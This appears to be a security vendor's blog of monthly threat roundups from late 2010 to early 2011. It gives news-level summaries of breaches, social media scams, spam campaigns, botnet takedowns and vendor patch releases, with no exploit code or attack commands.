Major Hits

Automattic, the company that maintains WordPress.com admitted a breach in which parts of their sensitive code could have been copied. Even though WordPress is an open source project, there are apparently bits which are not that open.

We all presume that U.S. federal sites are protected the most. They really should be. However, the latest hack on the Oak Ridge National Laboratory showed us the contrary. Spear-phishing is really a challenge for everyone these days.

April was also a month of data breaches including marketing company Epsilon, the European Space Agency, and Sony. These breaches may have affected millions of individuals in their recipient databases. Be wary of and suspect all emails coming from your usual and otherwise trustworthy senders. Remember also to regularly change your passwords. 

With all of the breaches running around, the news about the kidnapping of Kaspersky's son sounded like something unusually new. It apparently took only two days for Russian police to free him from the kidnappers. It would be great if we could fix all data breaches so quickly.

Web 2 dot uh oh

How can you tell whether a Facebook scam is effective or not? By the number of "likes" it can gather. All you need is a very provocative title, like "The Hottest & Funniest Golf Course Video" scam then sit back and see how many facebook users dare to click the Like button to see the said video. As expected, the end result is a number of survey scams and no trace of the promised video.

Scammers are picky, too, sometimes, as demonstrated in "My Top 10 stalkers" scam. This scam targets specific countries based on the user's IP address. The U.S., Norway, U.K., and the United Arab Emirates are some of the targeted locations.

A CAPTCHA image sitting on top of a Facebook comment box is the pawn used by scammers in a recent click-jacking attack. The lure promises yet another provocative video while the real intent is of course for scammers to offer surveys and games.

Facebook issued a fix on a glitch discovered by Turkish researcher Serkan Gencel involving users who linked their Facebook profile to a Hotmail email address.

In early April, reports surfaced about Google adding a banner to GMail accounts warning if someone from China accessed someone's user account. This sort of security blanket, along with Google's two-factor authentication, seem to be Google's response in the wake of the infamous Aurora attack.

Exploit kits appear to be stealing the spotlight from the usual rogue AV payload on poisoned search results. Searching for celebrity child "Presley Walker" returned some poisoned image search results with both exploit kit and rogue AV as its payload.

Apparently, even Twitter users are curious to see who tried to view their tweets. Twitter-ers who fall victim to this rogue app called "Profile Spy" are offered endless surveys, pop-ups and ads.

Smartphone apps invading privacy? That's the case federal prosecutors are making on Pandora, claiming that the company has been supplying advertisers with consumer information using one of its free smartphone apps running on Google's Android OS.

Microsoft

Microsoft released its biggest ever Patch Tuesday of this year in April. It updated 17 bulletins covering 64 vulnerabilities in Windows, Office, Internet Explorer, Visual Studio, SMB, .NET Framework, and GDI+. Among them, 9 bulletins are rated critical and 8 as important.

The most important fix is MS-018 that provided a cumulative security update for Internet Explorer. This security update is rated as critical for Internet Explorer 6, 7, and 8 on Windows clients; and Moderate for Internet Explorer 6, 7, 8 on Windows servers. Internet Explorer 9 is not affected by the vulnerabilities. Microsoft encouraged all users to apply this bulletin first.

The other top 8 critical bulletins fixed vulnerabilities in the SMB client and server, .NET Framework, GDI+, DNS Resolution, JScript and VBScript Scripting Engines, and CFF Driver.

From 60 vulnerabilities Microsoft patched, 30 of them are addressed by a single bulletin MS11-034 which resolved the vulnerabilities in Windows Kernal-Mode Drivers that lead to elevation of privilege. The XSS vulnerability CVE-2011-0096 has been patched in MS11-021.

Beginning in April 2011, the MSVR(Microsoft Vulnerability Research) program began issuing MSVR Advisories that Microsoft had privately disclosed to third-party vendors. It published two bulletins in April. One is covering Use-After-Free Object Lifetime Vulnerability in Google Chrome, the other is about HTML5 Implementation in Chrome and Opera. All the vulnerabilities were already patched by December 2010.

Hello ThreatSeeker® Network. You've got mail!

Another malicious e-card campaign attacked innocent users. What was on the menu this time? Nicely obfuscated content providing spicy iframe to rough AV. Sounds good to you? Sorry, we don't serve this juicy content to our users.

Do you have a small business and wouldn't $1,500 make your month nicer? Well, forget about promises offering easy money for an "innocent" money transaction. First, you give up your confidential data to "who-knows-who" followed by installing some malicious friend on to your computer.

Osama Bin Laden's death is big news. Everybody is curious and wants to see the proof. Why not, right? Be wary though. It is better to live without the proof than infect your computer with an unwelcome maliciously crafted guest.

Security Trends

"Coreflood" botnet was taken down by the U.S. Justice Department and the FBI. "Coreflood" was an infamous botnet that emerged almost a decade ago as a high-powered virtual weapon designed to knock targeted Web sites offline. While investigators counted 413,710 infected machines from March 2009 to January 2010, the total number of machines that were, or had been, part of Coreflood is more than 2.3 million, with more than 1.8 million of them appearing to be located in the U.S.

A new marketplace has sprung up to buy and sell IPv4 addresses (or rather, to broker transfers from one organization to another with dollar figures attached). Sites like www.depository.net, www.addrex.net, and www.tradeipv4.com look like they'll be with us for a while.

Nikon's Image Authentication System has an vulnerability that revolves around cryptographic shortcomings in how the secure image signing key is handled by Nikon digital cameras. The Russian encryption specialist, ElcomSoft, has already created a gallery of hoax images that successfully pass validation with Nikon Image Authentication Software. 

Apple's iPhone and iPad constantly track users' physical location and store the data in unencrypted files on both the iOS device and any computers that store backups of its data. That information can be used to reconstruct a detailed snapshot of the user's comings and goings.

Websense solutions with the ThreatSeeker Network and our Advanced Classification Engine (ACE) helped protect customers from April’s blended threats

This month's roundup contributors:

• Ivan Sabo
• Grace Timcang
• Qiong Ran
• Xue Yang
• Lei Li

Month of March

Major hits

March 17 of this year will be remembered very well for a long time - in fact, we should celebrate it as the BreachID Day from now on. RSA’s Executive Chairman Art Coviello wrote an open letter explaining a short background about the breach, which happened in their “kitchen” as an “extremely sophisticated cyber attack” that put their SecurID product at risk. Even though the breach probably did not disclose any very sensitive data, it pointed out just how fragile the security is.

Popular streaming service Spotify got compromised via third-party ads that served malicious content to all free users. Seems like free does come at a price after all.

Comodo, a cerificate vendor, informed us that nine bogus SSL certificates had been issued for several top Alexa domains. The certificates were revoked immediately. Well, once Comodo found out what had been going on. However, it happened again for two more and again and - in fact, who knows what else?

Are you using TripAdvisor when planning your holidays? You really should expect more spam in the future. The company announced a breach losing all members data. Fortunately, no credit card details - for this time at least.

First the EU, then the French government - it looks like a new “fashion” hype. “We have been hacked!” or “attacked” or “infiltrated” or ... This month revealed more than one cyber attack. Probably, we should just call it the BreachID Month after all this.

Some may think a couple of breaches a month is not that unusual of a thing. Well, there is more. Play.com let “only customer emails” go for a walk not knowing where. Maybe they'll come back in fit form one day, won’t they? Ah, and of course, there is another one: PHP.net found some muddy tracks on one of their servers. You see, the BreachID Month suddenly makes more sense now.

Some may STILL say these are normal issues. We have one more in our back pocket though. LizaMoon mass injection compromised some hundreds of thousands of URLs in a matter of hours. iTunes was one of the big names there. You see, this March was really an unusual month in the end.

Web 2 dot uh oh

Ashton Kutcher's twitter account appeared to be hacked in early March, posting 2 tweets on his behalf. This compromise challenges Twitter's security policies in using SSL.

Facebook recently introduced Report Suicidal Content, a service that would allow Facebook users to report any Facebook friend who has posted suicidal content on their accounts. This is in response to the growing number of suicidal posts in Facebook in the last few months.

A 17-year old was arrested in connection with the Facebook birthday hoax in Sydney. The suspect apparently posted a birthday invite after creating a fake Facebook account of a girl, which then hauled 200,000 positive replies.

Browser and friends

This month, Apple has more stories to tell us. Firstly, Apple releases iTunes 10.2 for patching a whopping 57 security  vulnerabilities, some  serious enough to get complete control if a user simply opens an image file or surfs to a compromised website. 50 out of 57 vulnerabilities were fixed in Webkit. Also, Apple has security updates  for Pwn2Own vulnerability, which is exploited by the winning hacker in Pwn2Own 2011. It is used to hijack an iPhone 4 address book when users surf to a rigged website hosting a Microsoft PowerPoint document via iPhone 4’s built-in Safari browser.

And finally, there is a Java update for  MAC OS X users. One of the most serious flaws could allow an untrusted Java applet to execute  arbitrary code outside of the Java sandbox.

Adobe has announced a Flash Player update to fix a critical security hole: new 0-day vulnerability. This vulnerability could cause a system crash or allow attackers to get in via a Flash(.swf) file embedded in a Microsoft Excel(.xls) file, delivered as an email attachment.

Firefox  4 releases included a number of significant security features. Mozilla also provided security updates for some older browsers and added some newly blacklisted SSL certificates from the “Comodo Affair.”

This month, WordPress has released an update for its version to 3.1.1 where three security issues have been fixed.

Microsoft

Microsoft released three bulletins that patched four security holes in Windows and Microsoft Office in patch Tuesday of this month. Two vulnerabilities were fixed in critical bulletin MS11-015, which resolved one publicly disclosed vulnerability CVE-2011-0032 in DirectShow and one privately reported vulnerability CVE-2011-0042 in Windows Media Player and Windows Media Center. The vulnerabilities only can fire when a user opens a specially crafted Digital Video Recording(.dvr-ms) file. If this is not opened, the attack will not be successful.

The second update MS11-016  patched Microsoft Groove Insecure Library Loading Vulnerability CVE-2010-3146 that could allow remote code execution if a user opens a legitimate Groove-related file that’s located in the same network directory as a maliciously crafted library file. Users who have administrative rights are easily impacted compared with users who own fewer rights on the system.

The third one MS11-017 rated as an “important” bulletin is covering a code execution flaw CVE-2011-0029 in the Windows Remote Desktop Client. Like the vulnerabilities in the first bulletin, the user has to manually execute a RDP file for Remote Desktop in order to work the attack successfully.

Except for the batch of updates, some well-known vulnerabilities like the XSS vulnerability CVE-2011-0096 remain unpatched. Microsoft provides the fix workaround in one advisory to help users. Also for the Malware Protection Engine Elevation of Privilege vulnerability CVE-2011-0037, Microsoft suggests users ensure that the Microsoft Malware Protection Engine is kept up to date automatically, which can solve this issue.

Windows Internet Explorer 9 was released to the public on March 14, 2011. To protect the security and privacy of your information, IE9 has introduced Tracking Protection and ActiveX Filtering. Tracking Protection can limit a browser's communication with certain websites to help keep your information private; ActiveX Filtering blocks ActiveX controls for all sites. Other security features are also included such as SmartScreen Filter, Cross site scripting (XSS) filter, and Domain highlighting. IE9 is supported by all new versions of MS Windows but not by Windows XP.

Hello ThreatSeeker® Network. You've got mail!

One of the largest spam generator botnets - Rustock was taken down by the Microsoft digital crime unit and U.S. federal law enforcement agents. Global spam volumes noticeably decreased since March 16.

Following the disaster in Japan on March 11, cybercriminals tried to utilize every possible underground technique to benefit from this occurrence. Apart from already known vectors such as phishing and malicious spam emails, criminals used Viral Facebook applications.

Fake Facebook email, the Black Hole Exploit Kit, and Zeus are three well-known tools/techniques used by criminals on a daily basis.  On March 18, a malicious campaign masquerading as Facebook emails was seen in the wild. The campaign was originated by Cutwail/Pushdo spam bot, had a link leading to the Black Hole Exploit Kit, which was serving a Zeus/Zbot Trojan as a payload.

Security trends

RIM bulks out its consumers offering to locate, back up and remotely wipe users’ BlackBerry handsets. The free BlackBerry protect service is now in open beta without an IT department behind users. The application has been in closed beta since December, but can now be downloaded from the BlackBerry App World.

Security researcher Luigi Auriemma has released proof of concept code for 34 vulnerabilities affecting popular SCADA systems. The majority of the vulnerabilities allow remote code execution on Internet-connected systems, with the remaining offering access to stored data.

A Dutch court has ruled that hacking into an open wireless networks is not a crime in the Netherlands. The law in the Netherlands defines a computer as a machine involved in the "storage, processing and transmission of data." Since a router is not used to store data, a judge reasoned it fails to qualify as a computer – and thus the computer hacking law isn't applicable.

Intel start working with customers using embedded computers in all kinds of devices after its $7.7 billion acquisition of security software maker McAfee. The security can be baked into the devices such as printers, automated teller machines, televisions, and cars. They're drawing a plan to provide more security-assisting features on Intel's future chips.

This month's roundup contributors:

Ivan Sabo
Grace Timcang
Qiong Ran
Xue Yang
Artem Gololobov
Lei Li

Month of February

Major Hits

Two major compromises affected the UK in February. Web sites for BBC - 6 Music and BBC Radio - 1xtra were compromised and were serving a malicious iFrame to the Phoenix exploit kit. In addition, AutoTrader, eBay, the London Stock Exchange, Myvue, and many other high-profile locations were hosting ads from an ad provider called Unanimis. This Malvertising campaign occurred over a weekend, and thus did not affect as many people as it might have during work days. The advertisement had an iFrame to another exploit kit that used attachs similar to the Black Hole exploit kit.

Night Dragon attacks were also active.  Night Dragon targets U.S. oil, gas, and petrochemical companies. It steals proprietary and confidential information from executives, by using a combination of social engineering, Remote Administration Tools (RATs), and SQL injection attacks to gain access to external and internal hosts inside companies. It is believed that the attackers are based in China, which may be why the class of attacks is called Night Dragon.

A leaderless and anarchical Internet group, Anonymous, declared war against HBGary Federal when their head of security services said he had uncovered and planned to release the identities of Anonymous’ leaders using social networking sites. Anonymous broke into HBGary Federal’s systems and released their internal confidential information. Whoops.

Several thousands of small businesses and personal sites felt victim to an error of the U.S. Department of Homeland Security and Department of Justice. These Departments announced the seizure of several domains that were involved in the distribution of child pornography. In addition to closing those domains, they managed to shut down a popular shared domain that belongs to a free DNS provider - which resulted in disconnecting of other 84,000 web sites - subdomains of mooo.com. After the incident, several thousand site owners were able to witness a banner with a message stating that advertisement and distribution of child pornography is illegal. 

Researchers discovered a way of accessing passwords stored on iPhone and iPad. The method involves physical access to the device and takes no more than 6 minutes - enough time to carry out this procedure on stolen or unattended devices.

Gambling addiction did not benefit the Hacker who has admitted stealing $12m worth of gaming chips. The hacker has transfered 400 billion gaming chips into his fake Facebook account after gaining unauthorized access into servers of a game developer Zynga, by posing as one of the site administrators.  Ashley Mitchell was trying to sell his illegal gain for about £180,000.

A major incident happened with Australian cosmetics retailer Lush - hackers managed to access and steal the company's entire customers database along with customers' credit card details. The company had not been aware of the vulnerablility, caused by not keeping the Web site updated, and could not identify for how long this security breach had been happening. 

Two major online dating sites, PlentyOfFish.com and eHarmony, got hacked, and the personal and password information of their users were believed to be exposed. Ethical and legal questions were raised regarding the companys' compensation toward such third-party security alerts.

A high-profile victim of malware attacks this month was Nasdaq. According to Nasdaq, there was no evidence that customer information had been exposed by breach. Investigations continue to assess whether the earlier anomalies in the stock market last summer were caused by stock exchange subversion activities.

Web 2 dot uh oh

A couple of Facebook security holes were discovered in February. First was an authentication flaw that allows a malicious Web site to disguise itself as other legitimate sites. This happens only when a malicious Web site is visited while the user is logged into Facebook. Second is yet another saga of clickjacking attacks, this time targetting Italian, Japanese, and Cyrillic audiences. Promises of interesting and perhaps controversial videos led Facebook users into clicking the "Like" button.

It's always interesting to see who viewed your Facebook profile. This statement is proven true as this scam is used over and over again to seduce users into adding shady applications that promise to do this, but instead lead to survey scams. You don't even have to be a developer to carry out these survey scams, because these are usually built using a pre-defined toolkit for only $25 or even less.

Something you know and something you have are the secret ingredients to Google's 2-factor authentication process, which hopes that any attempt to break into Google accounts would be next to impossible. This should serve well those users with weak passwords, because a required one-time password will be sent via text message or voice call whenever a user enters his or her password. This feature will be available to all of Google's free online services. 

Data war between Facebook and Google is the headline towards the end of February. Updates of Google's Nexus S Android phone will no longer appear as if Facebook contacts are integrated with its Android Contacts app. Until Facebook introduces an API similar to Gmail, this standoff has yet to be concluded. 

Browser and friends

Adobe delivered a group of patches in the early part of February. Although not the top threat source, PDF exploit is still a favorite of cyber criminals. In the security update for Adobe Reader and Acrobat, 29 vulnerabilities have been fixed, 23 of which could cause the application to crash and potentially allow an attacker to take control of the affected system. Meanwhile, 13 vulnerabilities have been patched for Adobe Flash Player and 21 vulnerabilities have been patched for Adobe Shockwave Player.

As the most targeted application by exploit, Java has a security update this month. Oracle patched 21 Java security holes; 19 of these vulnerabilities may be remotely exploitable.

Google has updated Chrome to 9.0.597.107 with 19 vulnerabilities fixed.

Also drawing attention is that Pwn2Own 2011 will be held in March in Vancouver. The conference will reward the hacker who successfully hacks IE, Safari, Firefox, or Chrome on a 64-bit system running the latest version of either OS X or Windows 7. Chrome was the only one that survivedast year; who will be the survivor this year?

Microsoft

On Patch Tuesday In February, Microsoft released twelve secruity bulletins. Three of them have a maximum severity rating of Critical. The first one MS11-003 resolves four vulnerabilities in Internet Explorer that could allow remote code execution when a user visits the specially crafted Web page. The second one MS11-006 is a patch for a newly released vulnerability (CVE-2010-3970) last month in Windows Shell Graphics Processing.  The last critical update MS11-007 resolved a privately reported vulnerability in the Windows OpenType Compact Font Format (CFF) driver. The other nine bulletins are rated “important”. The whole patch can be applied to the Microsoft Windows operating system, the Internet Explorer browser, the Microsoft Office productivity suite, Visual Studio, and IIS. However, the recently disclosed cross-site scripting vulnerability in MHTML was still not fixed in February.

In addition to the twelve security updates, Microsoft also released an important but non-security advisory (967940) related to Windows Autorun. The update provided a live package to restrict AutoPlay functionality to only CD and DVD media, in order to help protect customers from attacks involving the execution of arbitrary code by Autorun when a USB flash drive is inserted, with network shares, and with other non-CD media containing a file system with an Autorun.inf file.

In the middle of February a new vulnerability was discovered exploiting an SMB component of Windows. MS SRD quickly posted a blog on this vulnerablity stating that remote exploited code execution is unavailable.

At the end of February, Microsoft published a security advisory (24918888) to remind customers to be aware of an update to the Microsoft Malware Protection Engine. This is a privately reported vulnerability that could allow elevation of privileges if the Microsoft Malware Protection Engine scans a system just after an attacker who has valid login credentials and is using a specially crafted registry key. However, the vulnerability could not be exploited by anonymous users.

Hello ThreatSeeker. You've got mail!

A recap of the past month kicks off with a noticeable increase in spam, as well as spammers going green, having recycled templates or made modifications to slightly older campaigns, in order to present these with a more current theme or touch, offering a convincing effect to all who read them.

This was followed with the repeat offender the Magic blue pill with its mystical attributes, just in time for the Valentines Day rush. This again was aligned almost perfectly with the season to stock up for couples planning romantic getaways. Spammers prove time and time again that they are very much in touch with hot trends and what is current. 

Last, but by no means least, we have the use of social engineering techniques to lure the unsuspecting user into clicking on a provided link within an email. The email message titled "The refreshed site of our company", was not seen in high volumes but was quite an interesting find all the same, because there were common characteristics with malicious style compromises crossing over into the spam domain. This then begs the question: could there be a direct correlation between the two?

Security Trends

Tippingpoint released 22 not patched vulnerabilities from different vendors. Tippingpoint is the operator of the "Zero Day Initiative" bug bounty program. They announced that they would release details 180 days after they become aware of a bug, even if the vendor has not yet released a patch.

Spam image pages have been swapped for scam alerts on imageshack.us. Imageshack said they were able to find over 300 scam images uploaded to their services and were able to replace them with an alert image within an hour of their being reported.

Suspicious companies were started to pay writers money to embed spyware into mobile applications. Mobile users typically have less control of their devices than PC users; therefore more care should be taken when you install applications onto mobile devices.

Visa has relaxed its regulatory rules so that European high street merchants who capture at least three-quarters of their take through EMV-enabled chip-and-PIN terminals will no longer have to pass Payment Card Industry Data Security Standard (PCI DSS) audits every year.

This month's roundup contributors:
Artem Gololobov
Ping Yan
Grace Timcang
Ulysses Wang
Xue Yang
Amon Sanniez
Lei Li

Month of January

Major Hits

Billy Rios brought up a neat way to bypass Flash's local-system sandbox. To get the local files from the hard drive to an external server, he needed to use a non-blacklisted protocol handler. His PoC shows how how the MHTML protocol handler can break the strongly defined restrictions that Adobe Flash has. As the method looked so cute, somebody got inspired and successfully tried the same protocol against Microsoft too.

We had at least two more victims of malicious hacking this month. Lush left their customers vulnerable to credit card fraud for several months, and Trapster leaked more than 10 million registered users' details. Sometimes being warned about speed cameras is not actually that valuable.

On 27th January 2011 the world blacked out. At least for Egypt. All communication channels were suspended by the national government in an apparently desperate effort to block political protests. More than 80 million people stopped communicating. You should probably book holidays in a different location this year.

Open source software development and distribution portal SourceForge was hit by a major attack. This action exploited several of their servers and many others have been shut down proactively. It looks like "you-know-who" does not like open source at all. Who is "you-know-who" though?

Unlike the Egyptian government, Tunisia apparently decided to keep their communications on but intercept all user names and passwords for the major Web 2.0 portals, including Gmail, Facebook, and Yahoo. An injected code was found on all of the mentioned Web sites "siphoning off login credentials". One government rules them all. By the way, Tunisia is not the greatest destination for this year either.

Amazon was apparently gimmicking Gawker. A failing security implementation caused issues with older Amazon.com accounts' passwords, making them case-insensitive or allowing added-on extra characters. So a password "protected" was the same as "PROTECTED" or even better, as "ProtecTED1234" and so forth. This applied to older accounts only, so simply by changing your password to a new one (or even the same one) make things much more secure. Have you been with Amazon for a long time now? Go and change your password "just for fun".

Web 2 dot uh oh

A slew of malicious attacks streamed Facebook this month. A worm, disguised as a photo viewer application, tricked users into installing the said malware when the "View Photo" button was clicked. Koobface is making its rounds once more and employing a couple of new tactics at hand as a new campaign spread using compromised accounts to send out direct messages. French President Nicolas Sarkozy and Facebook CEO Mark Zuckerberg's fan pages were apparently hacked and were used to distribute unusual political messages. 

Facebook celebrated Data Privacy Day by offering its users the option to enable HTTPS connections. They also introduced Social Authentication, a concept very similar to Image CAPTCHA, but instead of using dictionary images, this feature uses actual pictures of a user's Facebook friend and asks him or her to name that person. 

Malware authors abused Google's redirection service, goo.gl, in their Twitter worm campaign which ultimately redirects users to fake AV sites.

Browser and friends

Google Chrome has fixed multiple vulnerabilities in stable channel versions prior to 8.0.552.237. These vulnerabilities include a stack corruption vulnerability in the PDF renderer component, two memory corruption vulnerabilities in the Vorbis decoder, and a video frame size error resulting in a bad memory access.

The VirusTotal Web site released a plugin for Firefox named VTzilla. It allows users to scan downloads directly with VirusTotal's Web application before storing them. Moreover, it will not only scan files, but also URLs.

Apple fixed a man-in-the-middle attacker vulnerability in OS X 10.6. This vulnerability may be able to cause an unexpected application termination or arbitrary code execution if using a special formatted string in PackageKit's handling of distribution scripts.

Microsoft

The start of 2011 feels a bit far away by now but it was just the start of the year that unleashed a new zero day vulnerability in Microsoft’s Graphical Rendering Engine (CVE-2010-3970). The exploit takes advantage of the way thumbnails or previews are processed and presented to the user by Explorer.exe and can be triggered by crafting an exploit file and sending it to a target (the victim must view the file in a folder where thumbnails or previews are set). The security hole hasn't been patched yet and was added to the Metasploit framework. 

January’s patch Tuesday brings an end to 3 major security holes in two released updates. One critical update fixes two issues in Microsoft Data Access Components (MDAC) where one of them could allow taking over a targeted system by visiting a specially crafted Web page (MS11-002). The second update fixes an issue in Microsoft Backup Manager where opening a legitimate remote Windows backup manager file can load a specially crafted malicious library – if located in the same directory (MS11-001). No attacks for any of the updates have been spotted in the wild. There are two holes in Windows that are yet to be patched, the mentioned vulnerability in Microsoft’s Graphical Rendering Engine and a vulnerability in Internet Explorer’s Cascading Style Sheets (CVE-2010-3971). We alerted on both vulnerabilities here and here. If you're wondering why Microsoft didn’t release a patch for those two holes in January’s patch Tuesday despite the fact that they have publicly available proof-of-concept code, how they prioritize patches is explained in their Research and Defense blog.

The end of January brings a vulnerability in Windows: this time it’s not remote code execution but a vulnerability in the MHTML protocol handler that could allow “information disclosure”. This effectively means that the MHTML protocol could be used to perform an XSS attack on the local machine when a user opens an HTML file with Internet Explorer (any version of it). More details on a workaround to prevent this attack and some examples in Microsoft Security Research and Defense blog

Some good news for Microsoft as it released some updates to its secure development tools suite. One of the tools is called “Attack Surface Analyzer” which aims to give security professionals a clear picture of an installed application's changes to the system, allowing them to determine any security implications. It does that by “diffing” the state of the system before and after the application is installed. The tool is in Beta and available for 64bit version of Windows only. More details about the tool here. 

Hello ThreatSeeker. You've got mail!

Security Trends

Month of December

Major Hits

December was completely flooded by the "Wikileaks case." Anonymous launched a series of DDoS attacks against "the enemies":  PayPal blog, Post Finance, EveryDNS, Mastercard and many others. Low Orbit Ion Canon (LOIC) showed also showed strong potential. 

Thanks to a vulnerability open to the world for 6 months, 1.5 million usernames, email addresses, and DES-encrypted passwords were released on Pirate Bay. Anonymous was involved again. Can you guess who we are talking about? Gawker Media did not receive good PR this time.

Once again, an undisclosed number of customers' private details such as email addresses, contact information, and birthdates were leaked from the McDonalds database. There were no burger give-aways though.

Browser and friends

Google reacted to the threats exploiting PDF and Flash. Sandbox, a Google technology, is a method of isolating an application from the rest of the operating system while tightly controlling its resources. The Chrome 8.0.552.215 update includes a new built-in PDF viewer that is secured in Chrome's sandbox. PDF files are contained within the sandbox environment. Twelve vulnerabilities were fixed in this version. In mid December, Google extended the sandbox to support Adobe's Flash Player plug-in in its Chrome browser.

Two zero-day vulnerabilities were found in Internet Explorer. One of the vulnerabilities, CVE-2010-3971, allows remote attackers to cause a denial of service and execute arbitrary code via multiple @import calls in a crafted document. Details can be found here.

Mozilla released a security update to patch 11 vulnerabilities, 9 of which are rated "critical" because they can be used to run attacker code.

Apple shipped a new version of QuickTime Player with 15 security holes fixed.

Microsoft

On Black Tuesday December 2010, Microsoft released 17 bulletins intended to patch 40 vulnerabilities across Windows, Office, Internet Explorer, SharePoint Server, and Exchange. Of the bunch, 2 bulletins were rated critical, 14 important, and 1 moderate. 

In total, Microsoft delivered 106 security bulletins in 2010, the highest number in history.

Microsoft was also confronted with 2 zero-day vulnerabilities this month. The first vulnerability (CVE-2010-3971) targets the way Internet Explorer handles Cascaded Style Sheets (CSS). The second vulnerability is found in Microsoft WMI Administrative Tools WBEMSingleView.ocx ActiveX control. Both exploits can be used by remote attackers to take complete control of a vulnerable system.

Hello ThreatSeeker. You've got mail!

Spam levels declined in December compared with November 2010.  There were 2 significant points in December.

First we saw a drastic decrease in the output of spam from bots, particularly Rustock.  This became apparent during Christmas time.

An increase in spam output was seen on January 10. However, spam levels are still not yet back to November levels.

Also significant in December was the New Year-themed spam output from a bot widely speculated as being associated with Waledac/Storm. Spammers were up to their usual social engineering tricks pushing out Happy New Year videos.

Security Trends

Gallup's 2010 crime survey found that computer-related crime is a growing problem for average Americans. Eleven percent of U.S. adults reported tha tduring the past year, they or a household member were victims of a computer or Internet crime on their home computer. This is up from the 6% to 8% level found in the previous 7 years.

A new Android Trojan called Geinimi emerged from China on the end of December 2010 displaying botnet characteristics. The malware compromises a significant amount of information on a user's Android smartphone and sends the information to remote servers. The information it collects includes location coordinates and unique identifiers for the device (IMEI) and SIM card (IMSI).

On the topic of computer security for 2011 you may be interested to read our Threat Report which details the threats that we predict will pick up pace in 2011.  Read it here.

This month's roundup contributors:

• Carl Leonard
• Lei Li
• Ivan Sabo
• Ulysses Wang
• Xue Yang

Month of November

Major Hits

Amnesty International's Web site in Hong Kong was compromised and was attempting to infect its visitors using various exploits for Adobe Flash, Adobe Shockwave, Apple Quicktime, and even the latest zero-day for Internet Explorer. In other parts of Asia, India's number 1 financial portal (moneycontrol.com) was also compromised and injected with a malicious iframe.

Malicious hackers capitalized on important local and global events, such as midterm elections (US), Veteran's Day (US), and Prince William's engagement (UK), to infect more Web users via poisoned search engine results. This scam is of the usual garden variety: fake antivirus Web sites, or sites offering fake Adobe updates and fake Firefox updates, which prompt a user to download an .exe file that is really malware.

Web 2 dot uh oh

Google recently launched "Google Instant Previews," a new service that aims to give Google-rs a bird's eye view of what the site they are about to visit looks like.  This service should initially protect users against unwanted content, but our research proves that it could mislead users when snapshots used in the service are not as current as assumed.

Social engineering is the game in Facebook this month. Our Defensio Facebook App spotted scam wall posts containing a link that attempts to post on the victim's behalf.  Phishing messages claiming to be from Facebook Security warn that a user account will be deactivated unless it's reconfirmed.  The phishing page itself is either loaded from within Facebook via iframe or redirected from the link provided in the message.

Browser and friends

Adobe released a security update for Adobe Flash Player in early November. Eighteen security holes have been patched, including vulnerability CVE-2010-3654, which is a zero-day vulnerability in the wild found in October.

Another zero-day vulnerability (CVE-2010-4091) has been identified in Adobe Reader 9.4 (and earlier versions) and Adobe Acrobat 9.4 (and earlier versions). A proof of concept has been published that it could lead to a Denial of Service, although that has not been demonstrated. Arbitrary code execution may be possible. Adobe patched the hole in 2 weeks; the security update is here.

A vulnerability in Shockwave Player has been discovered. Successful exploitation allows the execution of arbitrary code, but a user must be tricked into opening the "Shockwave Settings" window when viewing a Web page.

Google patched several high-risk vulnerabilities in Chrome 7.0.517.44. A $7500 award was paid out of Google's new vulnerability reward program.

A Denial of Service vulnerability has been found in Firefox 3.6.12. The proof of concept is published here.

The recent security update for Safari 5.0.3 and 4.1.3 contains 27 patched vulnerabilities. More than 40 vulnerabilities have been patched in iOS 4.2. Click here for details.

Microsoft

This month's round of "Black Tuesday" Microsoft patches was rather light, but contained fixes for some particularly severe issues.

On the unpatched side, Windows is currently vulnerable to 2 known privilege escalation exploits, one of which was found in a kernel API, allowing users to bypass user account control (UAC) entirely. The second, an exploit originally used in StuxNet, attacked the Windows Task Scheduler.

Internet Explorer once again finds itself host to an actively exploited bug (CVE-2010-3962) caused by a dereferencing error.

Hello ThreatSeeker. You've got mail!

An increase in the number of phishing emails has been a focal point over the course of this month. Most of them seem to be directed attacks at Email Service Providers (ESPs) in order for the attackers to gain access to "industry-grade email deployment systems" to do their bidding.  Spear-phishing, as it is known to most, is on the rise with several of these messages having the look and feel of legitimate requests to the unsuspecting user.  Like most of the email campaigns reported in the past, the format is usually the same: A user is lured into clicking a link within an email or to open an attachment, which results in the machine being infected.

Also in this month, with the release of the new, improved version of Adobe Reader, came the recycled phishing email messages enticing and advising users to upgrade  their readers to the newer version with all the bells and whistles.  As reported in Lenny Zeltser's blog, the format of these messages did not change much.  These types of email messages are not new, although it is interesting to note that cyber-criminals are keeping abreast of current changes and news and taking advantage of them.

Security Trends

A new version of the GpCode ransomware has been detected, using RSA-1024 and AES-256 as crypto-algorithms. It is now stronger than before, because it overwrites data in the files instead of deleting it after encryption, so users cannot get data back by using data-recovery software.

Google announced an experimental new vulnerability reward program that applies to Google Web properties. Google said it would pay the bounty for any serious bug that “directly affects the confidentiality or integrity of user data.”

Adobe released the Reader X version on November 19, 2010. A built-in sandbox feature has been implemented to contain the damage from potentially malicious PDF files. Adobe's blog posted a multi-part series about the new sandboxing technology used in the Adobe Reader.

A security researcher named Nitesh Dhanjani has discovered that a rogue Web site, or a Web site whose client code may have been compromised by a persistent XSS, can pull the user out of the Safari browser in iOS. A malicious Web site can initiate a phone call without the user's explicit permission with the us of insecure handling of URL Schemes. He also discusses a particular UI Spoofing behavior of Safari on iPhone, The consequence of full screen apps in iOS using UIWebView as the default Web browser on iPhone means the UI can display the fake URL bar on a page while the real URL bar is hidden.

This month's roundup contributors:

• Jay Liew
• Lei Li
• Grace Timcang
• Ulysses Wang
• Amon Sanniez
• Paul Westin

Month of October 2010

Major Hits

Websense Security Labs discovered that the official Web site of the Nobel Peace Prize was compromised by malicious hackers. The hackers inserted code that infects visitors using Mozilla Firefox. This zero day vulnerability has since been patched.

The exploitation of vulnerabilities in Java has spiked dramatically, as brought to light by Holly Stewart from the Microsoft Malware Protection Center (see chart below). 

The attacks can largely be attributed to 3 vulnerabilities:

(Image and stats from Microsoft)

Web 2 dot uh oh

The Web site of the popular and perhaps most-used Facebook API Open Graph, opengraphprotocol.org, was compromised leading users to a standard Rogue AV landing page.  The same malcode were seen on every single page of the Web site.

Lindsay Lohan is the celebrity decoy of October's social engineering scheme.  Fake Facebook invites enticed users to view sex tapes about the controversial actress.  Links included in the invitations turn out to be a typical survey spam page at the time.

